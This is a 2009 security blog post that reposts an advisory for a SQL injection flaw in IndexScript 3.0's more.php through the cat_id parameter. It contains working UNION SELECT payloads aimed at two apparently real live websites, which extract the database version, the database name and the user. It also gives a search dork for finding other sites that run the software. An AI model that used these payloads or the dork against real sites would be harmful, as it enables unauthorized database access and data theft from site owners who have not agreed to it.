IndexScript 3.0 SQL Injection Vuln ~ matthews

Monday, September 14, 2009

IndexScript 3.0 SQL Injection Vuln

2:45 AM matthews

[o] IndexScript 3.0 SQL Injection Vulnerability
Software : IndexScript version 3.0
Vendor : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author : NoGe
Home : http://antisecurity.org

[o] Vulnerable file
more.php

[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]

[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--

[o] Dork
"powered by IndexScript"

Posted in: vulnerabilities

matthews

Monday, September 14, 2009

IndexScript 3.0 SQL Injection Vuln

Popular Posts

Link for education

About Me

Blog Archive

Categories

news from Kecoak Elektronik Indonesia

news from SecurityFocus Vulnerabilities

adsensecamp

adbrite2

News from milw0rm

Labels

Blog Archive

Blogger templates

Blogger news

Location

Blogroll